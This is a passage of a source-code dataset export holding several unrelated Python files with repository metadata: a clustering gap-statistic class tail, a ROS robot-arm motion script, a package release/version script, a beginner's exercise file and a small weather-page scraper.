# 'null_wcss_samples': self.null_wcss_samples,
# 'est_n_clusters': self.est_n_clusters,
# 'possible_n_clusters': self.possible_n_clusters,
# 'metadata': self.metadata}
# if include_data:
# save_dict['X'] = self.X
# save_dict['U'] = self.U
# save_dict['D'] = self.D
# save_dict['V'] = self.V
# else:
# save_dict['X'] = None
# save_dict['U'] = None
# save_dict['D'] = None
# save_dict['V'] = None
joblib.dump(self,
filename=fname,
compress=compress)
# @classmethod
# def load_from_dict(cls, load_dict):
# # initialize class
# GS = cls(clusterer=load_dict['clusterer_name'],
# clusterer_kwargs=load_dict['clusterer_kwargs'],
# cluster_sizes=load_dict['cluster_sizes'],
# ref_dist=load_dict['ref_dist'],
# B=load_dict['B'],
# gap_est_method=load_dict['gap_est_method'])
# GS.obs_cluster_labels = load_dict['obs_cluster_labels']
# GS.obs_wcss = load_dict['obs_wcss']
# GS.null_wcss_samples = load_dict['null_wcss_samples']
# GS.est_n_clusters = load_dict['est_n_clusters']
# GS.possible_n_clusters = load_dict['possible_n_clusters']
# GS.X = load_dict['X']
# GS.U = load_dict['U']
# GS.D = load_dict['D']
# GS.V = load_dict['B']
# GS.metadata = load_dict['metadata']
# return GS
@classmethod
def load(cls, fname):
# load_dict = joblib.load(fname)
# return cls.load_from_dict(load_dict)
return joblib.load(fname)
@classmethod
def from_precomputed_wcss(cls, cluster_sizes, obs_wcss,
null_wcss_samples, **kwargs):
"""
Initializes GatStat object form precomputed obs_wcss and
null_wcss_smaples.
"""
assert len(obs_wcss) == len(cluster_sizes)
assert null_wcss_samples.shape[0] == len(cluster_sizes)
GS = cls(cluster_sizes=cluster_sizes, **kwargs)
GS.obs_wcss = obs_wcss
GS.null_wcss_samples = null_wcss_samples
GS.B = null_wcss_samples.shape[1] # NOTE: B may be differnt
GS.compute_n_cluster_estimate()
return GS
| [
"idc9@cornell.edu"
] | idc9@cornell.edu |
3514d2984f6184d63ccc6c01b4f10585b59cc95b | 72e0acb6b622a115f43259d21898578722478050 | /catkin_ws/src/apc_planning/src/goToMouth.py | cbd4c15de45517cebd2eb2595afc4736754a63b4 | [
"MIT"
] | permissive | LinuXperia/team_mit | d046bee98e0629b14eb0fb0fb32c839b0bc07c00 | 207c0df56fbe4f4e713c7fcab99f508e29d77bf2 | refs/heads/master | 2021-05-31T20:24:46.679180 | 2016-04-22T01:58:53 | 2016-04-22T01:58:53 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,616 | py | #!/usr/bin/env python
# goToMouth primitive:
# description:
# called when we want to go to mouth of bin, BE VERY CAREFUL IF CALLED INCORRECTLY
# OR AT A BAD TIME IT MAY HIT THE CAMERAS OR THE SHELF, designed to be used
# from home or from the objective bin, not when hand is inside the bin
# the robot moves in essentially a straight line from where it is to the home
# tcp pose (position is taken as argument, pose is assumed to be gripper open
# toward shelf)
# inputs:
# configuration of the robot when called, assumed to be at the mouth bin or
# at objective bin
# location of the home, xyz in world coordinate frame and orientation, this
# is subject to change
import geometry_msgs.msg
import std_msgs
import json
import tf
from ik.roshelper import ROS_Wait_For_Msg
from ik.ik import IK
import rospy
import pdb
import numpy as np
import math
import tf.transformations as tfm
import gripper
# put shared function into ik.helper module
from ik.helper import getBinMouthAndFloor
from ik.roshelper import coordinateFrameTransform
from ik.helper import pauseFunc
from ik.helper import visualizeFunc
from ik.helper import getObjCOM
from ik.helper import openGripper
from ik.helper import closeGripper
from ik.roshelper import pubFrame
def goToMouth(robotConfig = None,
binNum = 0,
isExecute = True,
withPause = False):
## robotConfig: current time robot configuration
joint_topic = '/joint_states'
## initialize listener rospy
listener = tf.TransformListener()
rospy.sleep(0.1)
br = tf.TransformBroadcaster()
rospy.sleep(0.1)
# plan store
plans = []
## initial variable and tcp definitions
# set tcp
l2 = 0.47
tip_hand_transform = [0, 0, l2, 0,0,0] # to be updated when we have a hand design finalized
# broadcast frame attached to tcp
pubFrame(br, pose=tip_hand_transform, frame_id='tip', parent_frame_id='link_6', npub=5)
# get position of the tcp in world frame
pose_world = coordinateFrameTransform(tip_hand_transform[0:3], 'link_6', 'map', listener)
tcpPos=[pose_world.pose.position.x, pose_world.pose.position.y, pose_world.pose.position.z]
tcpPosHome = tcpPos
# set home orientation
gripperOri = [0, 0.7071, 0, 0.7071]
# move to bin mouth
distFromShelf = 0.15
mouthPt,temp = getBinMouthAndFloor(distFromShelf, binNum)
mouthPt = coordinateFrameTransform(mouthPt, 'shelf', 'map', listener)
targetPosition = [mouthPt.pose.position.x, mouthPt.pose.position.y, mouthPt.pose.position.z]
q_initial = robotConfig
planner = IK(q0 = q_initial, target_tip_pos = targetPosition, target_tip_ori = gripperOri, tip_hand_transform=tip_hand_transform, joint_topic=joint_topic)
plan = planner.plan()
s = plan.success()
if s:
print '[goToMouth] move to bin mouth successful'
plan.visualize()
plans.append(plan)
if isExecute:
pauseFunc(withPause)
plan.execute()
else:
print '[goToMouth] move to bin mouth fail'
return None
qf = plan.q_traj[-1]
## open gripper fully
openGripper()
return plan
if __name__=='__main__':
rospy.init_node('listener', anonymous=True)
goToMouth(robotConfig=None,
binNum = 0,
isExecute = True,
withPause = False)
# objPose = [1.60593056679, 0.29076179862, 0.863177359104], binNum = 3
# objPose = [1.55620419979, 0.281148612499, 1.14214038849], binNum = 0,
# obJPose = [1.62570548058, 0.289612442255, 0.648919522762], binNum = 6,
| [
"peterkty@gmail.com"
] | peterkty@gmail.com |
7cc5e26b3b002ea59b7a91392cf6ad2b4d9042bb | 12b5584956797fcb0f48e7971bc074ae13a37489 | /pySpatialTools/release.py | b4439a5b0eb2c44ff32c36629289ad36af5e241a | [
"MIT"
] | permissive | tgquintela/pySpatialTools | a0ef5b032310aa1c140e805f4ee8c4a40fd2d10e | e028008f9750521bf7d311f7cd3323c88d621ea4 | refs/heads/master | 2020-05-21T22:09:08.858084 | 2017-02-10T11:18:41 | 2017-02-10T11:18:41 | 39,067,763 | 8 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,919 | py | """Release data for pySpatialTools.
The information of the version is in the version.py file.
"""
from __future__ import absolute_import
import os
import sys
import time
import datetime
basedir = os.path.abspath(os.path.split(__file__)[0])
## Quantify the version
MAJOR = 0
MINOR = 0
MICRO = 0
ISRELEASED = False
VERSION = '%d.%d.%d' % (MAJOR, MINOR, MICRO)
QUALIFIER = ''
def write_version_py(filename=None):
cnt = """\
version = '%s'
"""
if not filename:
filename = os.path.join(
os.path.dirname(__file__), 'pySpatialTools', 'version.py')
a = open(filename, 'w')
try:
a.write(cnt % (version))
finally:
a.close()
def write_versionfile():
"""Creates a static file containing version information."""
versionfile = os.path.join(basedir, 'version.py')
text = '''"""
Version information for pySpatialTools, created during installation by
setup.py.
Do not add this file to the repository.
"""
import datetime
version = %(version)r
date = %(date)r
# Development version
dev = %(dev)r
# Format: (name, major, minor, micro, revision)
version_info = %(version_info)r
# Format: a 'datetime.datetime' instance
date_info = %(date_info)r
# Format: (vcs, vcs_tuple)
vcs_info = %(vcs_info)r
'''
# Try to update all information
date, date_info, version, version_info, vcs_info = get_info(dynamic=True)
def writefile():
fh = open(versionfile, 'w')
subs = {
'dev': dev,
'version': version,
'version_info': version_info,
'date': date,
'date_info': date_info,
'vcs_info': vcs_info
}
fh.write(text % subs)
fh.close()
## Mercurial? Change that
if vcs_info[0] == 'mercurial':
# Then, we want to update version.py.
writefile()
else:
if os.path.isfile(versionfile):
# This is *good*, and the most likely place users will be when
# running setup.py. We do not want to overwrite version.py.
# Grab the version so that setup can use it.
sys.path.insert(0, basedir)
from version import version
del sys.path[0]
else:
# Then we write a new file.
writefile()
return version
def get_revision():
"""Returns revision and vcs information, dynamically obtained."""
vcs, revision, tag = None, None, None
hgdir = os.path.join(basedir, '..', '.hg')
gitdir = os.path.join(basedir, '..', '.git')
if os.path.isdir(gitdir):
vcs = 'git'
# For now, we are not bothering with revision and tag.
vcs_info = (vcs, (revision, tag))
return revision, vcs_info
def get_info(dynamic=True):
## Date information
date_info = datetime.datetime.now()
date = time.asctime(date_info.timetuple())
revision, version, version_info, vcs_info = None, None, None, None
import_failed = False
dynamic_failed = False
if dynamic:
revision, vcs_info = get_revision()
if revision is None:
dynamic_failed = True
if dynamic_failed or not dynamic:
# All info should come from version.py. If it does not exist, then
# no vcs information will be provided.
sys.path.insert(0, basedir)
try:
from version import date, date_info, version, version_info,\
vcs_info
except ImportError:
import_failed = True
vcs_info = (None, (None, None))
else:
revision = vcs_info[1][0]
del sys.path[0]
if import_failed or (dynamic and not dynamic_failed):
# We are here if:
# we failed to determine static versioning info, or
# we successfully obtained dynamic revision info
version = ''.join([str(major), '.', str(minor), '.', str(micro)])
if dev:
version += '.dev_' + date_info.strftime("%Y%m%d%H%M%S")
version_info = (name, major, minor, micro, revision)
return date, date_info, version, version_info, vcs_info
## Version information
name = 'pySpatialTools'
major = "0"
minor = "0"
micro = "0"
## Declare current release as a development release.
## Change to False before tagging a release; then change back.
dev = True
description = """Python package for studying spatial irregular heterogenous
data."""
long_description = """
This package is built in order to provide prototyping tools in python to deal
with spatial data in python and model spatial-derived relations between
different elements in a system. In some systems, due to the huge amount of
data, the complexity of their topology their local nature or because other
practical reasons we are forced to use only local information for model the
system properties and dynamics.
pySpatialTools is useful for complex topological systems with different type
of spatial data elements and feature data elements in which we are not able to
study alls at once because of the data size.
pySpatialTools could be not recommendable for treating some specific problems
with homogeneous and/or regular data which could be treated with other python
packages, as for example computational linguistics (nltk), computer vision or
grid data (scipy.ndimage and openCV) or others.
"""
## Main author
author = 'T. Gonzalez Quintela',
author_email = 'tgq.spm@gmail.com',
license = 'MIT'
authors = {'tgquintela': ('T. Gonzalez Quintela', 'tgq.spm@gmail.com')}
maintainer = ""
maintainer_email = ""
url = ''
download_url = ''
platforms = ['Linux', 'Mac OSX', 'Windows', 'Unix']
keywords = ['math', 'data analysis', 'Mathematics', 'spatial networks',
'spatial correlations', 'framework', 'social sciences',
'spatial analysis', 'spatial ecology']
classifiers = [
# How mature is this project? Common values are
# 3 - Alpha
# 4 - Beta
# 5 - Production/Stable
'Development Status :: 3 - Alpha',
# Indicate who your project is intended for
'Intended Audience :: Developers',
'Intended Audience :: Science/Research',
# Pick your license as you wish (should match "license" above)
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
# Specify the Python versions you support here
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
# Topic information
'Topic :: Software Development :: Build Tools',
'Topic :: Software Development :: Libraries :: Python Modules',
'Topic :: Scientific/Engineering :: Sociology',
'Topic :: Scientific/Engineering :: Data Analysis',
'Topic :: Scientific/Engineering :: Information Analysis',
'Topic :: Scientific/Engineering :: Mathematics']
date, date_info, version, version_info, vcs_info = get_info()
if __name__ == '__main__':
# Write versionfile for nightly snapshots.
write_versionfile()
| [
"tgq.spm@gmail.com"
] | tgq.spm@gmail.com |
d45c4ffc146c63112aedd4bc8278ee99af91e288 | 434ff9cae19d550c7b14b6219064051b6430537a | /codes.py | 576a80c56a81c84c8b9cc08575dcf224a4e401b1 | [] | no_license | RicoSaeg/Hackademy | ca050b7699d9c08f69b47d971baa68e853e918a0 | 77cdd270e40feed5ca49a0f06f05b86f9f06821f | refs/heads/master | 2020-04-22T21:52:42.502530 | 2019-02-14T12:45:09 | 2019-02-14T12:45:09 | 170,688,102 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,195 | py | import os
a_list = []
def my_sum(a_list):
total = 0
for n in a_list:
total = total + n
return total
def my_prod(a_list):
total = 1
for n in a_list:
total = total * n
return total
def my_count(a_list):
count = 0
for n in a_list:
count = count + 1
return count
def my_count_less_5(a_list):
count = 0
for n in a_list:
if n < 5:
count = count + 1
return count
def my_count_1(a_list):
count = 0
for n in a_list:
if n == 1:
count = count + 1
return count
def my_count_max(a_list):
count = 0
for n in a_list:
if n > count:
count = n
return count
def get_filename(a_dirname):
list_of_files = os.listdir(a_dirname)
print("list of the file name: ")
print(list_of_files)
all_files = []
for n in list_of_files:
full_path = os.path.join(a_dirname,n)
all_files.append(full_path)
return all_files
def flatten(a_list_with_lists):
new_list = []
for n in a_list_with_lists:
if isinstance(n, list):
for i in n:
new_list.append(i)
else:
new_list.append(n)
return new_list
list_in_list = [12,[3,4],36]
#12
#3 4
#36
def print_right(a_list_with_lists):
for n in a_list_with_lists:
if isinstance(n, list ):
for i in n:
print(i, end=" ")
print(" ")
else:
print(n)
def single_row_star(number):
for n in range(number):
if n % 2 == 0:
print("*" , end=" ")
else:
print("/", end=" ")
a = int(input("numb"))
b = input("hello")
def single_row_of(number, string):
for n in range (number):
print(string, end=" ")
# list_by_two = []
def square_of_stars(num):
for i in range(num):
for n in range(num):
print("*", end ="")
print(" ")
l = [2,3,4]
def list_by_two(list):
new_list = []
for n in list:
new_list.append()
return new_list
def list_opposite(a_list):
new_list = []
for i in a_list:
new_list.insert(0, i)
return new_list
| [
"rico.saegesser@student.unisg.ch"
] | rico.saegesser@student.unisg.ch |
a4606d1d35ea11062dd647cbdad4961bf71aa3a5 | 64a5fc21e81f8372ec4593bf8d823c1e5aba0145 | /gadget/weather.py | 98fa40f0185818be1a2fe2f5dca7350d4b50bdf9 | [
"MIT"
] | permissive | LemuriaChen/gadget | 0c23aafab4c88914d5a74881dfef0ebbc9369bb4 | 93b51553a56655a31cfa8d90ac9f6a469775fb8f | refs/heads/master | 2021-01-16T01:26:18.411722 | 2020-02-25T06:16:40 | 2020-02-25T06:16:40 | 242,925,204 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 431 | py |
from urllib.request import urlopen
from bs4 import BeautifulSoup
url = urlopen('https://tianqi.moji.com/weather/china/beijing/haidian-district')
soup = BeautifulSoup(url, 'html.parser')
alert = soup.find('div', class_="wea_alert clearfix").em
print("空气质量:" + alert.string)
weather = soup.find('div', class_="wea_weather clearfix")
print("当前温度:" + weather.em.string)
print("天气:" + weather.b.string)
| [
"dandanlemuria@gmail.com"
] | dandanlemuria@gmail.com |
111acc01dc097c4210bb5a6ad10ee46e028fafb2 | 2422e19d8d897c0f08f771abab7678ba75d6420c | /venv/lib/python3.6/os.py | 9756f9f1a0f43865bf6f03b703da672343eac01d | [] | no_license | Sagar5885/PythonRef | 7f3a81888ac75acf599dee365c9e4ff6a1a96ed1 | 9bc203e379f4c15f12f883cee306bcb4e72607cf | refs/heads/master | 2021-05-11T03:06:36.123468 | 2021-02-09T20:59:48 | 2021-02-09T20:59:48 | 117,907,147 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 43 | py | /Users/sdodia/anaconda3/lib/python3.6/os.py | [
"sdodia@walmartlabs.com"
] | sdodia@walmartlabs.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.